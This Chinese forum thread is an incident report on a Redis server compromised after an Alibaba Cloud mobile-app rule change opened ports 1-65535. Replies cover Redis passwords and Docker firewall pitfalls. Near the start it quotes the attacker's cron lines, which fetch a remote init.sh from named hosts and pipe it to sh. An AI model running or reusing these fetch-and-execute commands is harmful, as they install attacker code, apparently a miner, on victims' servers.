未分類
2021 年 2 月 5 日

阿里云手机 App 上的一个操作导致我的服务器被入侵

阿里云手机 App 上的一个操作导致我的服务器被入侵

資深大佬 : lerry 5

事情是这样, 刚才发现我的一个服务挂了,仔细检查发现是 redis 问题,
我勒个去,我所有的 key 都没了,只剩下 backup1 – backup12 这十二个 key,内容略有不同,大致是下边这样

nnn*/24 * * * * root wdt -q -O- http://py2web.store/cleanfda/init.sh | shnn
nnn*/4 * * * * root wget -q -O- http://176.123.10.57/cleanfda/init.sh | shnn

怎么会这样,平时只开必要的端口,6379 是绝对不开的

时间回到 1 个小时前,我新跑了一个服务,需要打开 tcp 端口 12345,我拿出手机,打开阿里云,操作安全组,开端口,一气呵成。

阿里云手机 App 上的一个操作导致我的服务器被入侵

咦?怎么不行?原来程序需要的是 tcp 端口,我设置成了 udp 。找到新增的一条规则,把 udp 改成 tcp,确定,O 了,搞定

阿里云手机 App 上的一个操作导致我的服务器被入侵

经过就是这样,看出问题了吗?以上过程均可复现

被入侵,我想过很多种可能,却没想到这一种

到现在我也没找到阿里云的安全组操作日志在哪里

大佬有話說 (29)

  • 資深大佬 : wunonglin

    你是说 udp 换成 tcp 的时候端口范围会变成 1/65535,然后没注意看然后就保存了是不?

    另外你 redis 干嘛 bind0.0.0.0 啊?

  • 資深大佬 : lerry

    @wunonglin #1 是的,用 docker 跑的 redis,有防火墙,就没在意

  • 資深大佬 : keepeye

    不管做什么操作,要核对一遍再提交

  • 資深大佬 : towser

    也没启用密码吧。现在扫 redis 的多如牛毛,我测试服务器放公网半小时就被入侵了。

  • 資深大佬 : YouLMAO

    没注意看

  • 資深大佬 : YouLMAO

    如果我是蚂蚁金服 ceo, 直接开除你和你全组, 线上服务器还能单人操作的不经 review 流程的

  • 資深大佬 : illl

    这个不应该是自己没设密码导致的呗

  • 資深大佬 : boris93

    @YouLMAO @illl
    严重事故从来都不是因为某个单独的原因,而是多个问题同时出现,而它们正好能导致一场事故
    即,瑞士奶酪理论

  • 資深大佬 : swulling

    不能因为内网就不设置密码。

  • 資深大佬 : matrix67

    赶紧重装机器,不单单只是 redis 被黑了

    说不定还会横向移动攻击数据库之类的,再加上现在还有 sudo 提权漏洞

    错就错在 “一气呵成” 啊

  • 資深大佬 : PerFectTime

    docker 发布端口的时候得加上 127.0.0.1
    防火墙规则对 docker 端口无效

  • 資深大佬 : lerry

    @matrix67 #10 还好是 docker 跑的,还有一个 postgresql 也是 docker 跑的有密码

    @PerFectTime #11 学习了,这个用的是阿里云的防火墙

  • 資深大佬 : mytsing520

    虽然有马后炮的嫌疑,但我是从不信任任何在手机端对生产环境进行的操作,即便是我自己或信任的人进行的操作,毕竟鬼知道会发生什么问题。

  • 資深大佬 : lxiszuhi

    linux 这么容易黑的吗?

  • 資深大佬 : lerry

    @lxiszuhi #14 默认端口+没有密码 特别危险

  • 資深大佬 : PerFectTime

    @lerry #12 ps: 防火墙规则对 docker 无效指的是 iptables

  • 資深大佬 : learningman

    @PerFectTime 对,这玩意儿最容易反应不过来,docker 默认 bind 0.0.0.0,然后还会自动加 iptables 规则

  • 資深大佬 : min

    你的 redis 不设密码导致你的服务器被入侵

  • 資深大佬 : yzbythesea

    安全组设成 0.0.0.0/10,真是心大啊。

  • 資深大佬 : d5

    赞同 18 的说法

  • 資深大佬 : saytesnake

    @learningman

    阿里云上我反而不担心这问题,有安全组配置,不过我没用过 APP,手机上弄这个不太好感觉。

    目前非一堆微服务的单体应用已经慢慢转成 Podman 了,非 root 启动搭配上 systemd 很舒适。

  • 資深大佬 : tankren

    redis 开放是根本原因 不过你可以提交“bug”给 APP 组啊

  • 資深大佬 : lopetver

    @matrix67 https://www.cnblogs.com/intbjw/p/14326312.html

    存在横向移动的,赶紧修复为主

  • 資深大佬 : lopetver

    ![image.png]( https://i.loli.net/2021/02/02/boLIRqUsmBvjXer.png)

    截止回复时还有 4 个旷工在线呢,算力最高达 450KH

  • 資深大佬 : lerry

    @yzbythesea #19 自己的程序,不是公司业务,家里没有固定 ip,现在改用 zerotier,不开放公网防火墙了
    @PerFectTime #16
    @learningman #17 受教

  • 資深大佬 : cnleon

    自己开放 1-65535,这还能怪别人?

  • 資深大佬 : lozt

    @cnleon 其实我也想问…第二张图…是表示端口全开了吧

  • 資深大佬 : lerry

    @lozt #25 是的,本来设置的 udp 12345,把 udp 改成 tcp,端口自己变成 1-65535 了,你不觉得这 App 的行为有问题吗

  • 資深大佬 : Mithril

    @lerry 阿里的东西习惯就好了,又不是没告你变成了 1-65535 。。。